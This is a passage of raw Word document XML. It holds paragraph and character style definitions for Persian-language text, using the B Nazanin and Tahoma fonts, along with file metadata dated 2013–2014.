      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24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D34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775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="fa-IR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91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912C4"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="fa-IR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00681551"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0023324C"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="MediumShading1-Accent11">
    <w:name w:val="Medium Shading 1 - Accent 11"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="63"/>
    <w:rsid w:val="00E93B0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39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mdgh</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-04T18:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-03-15T10:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>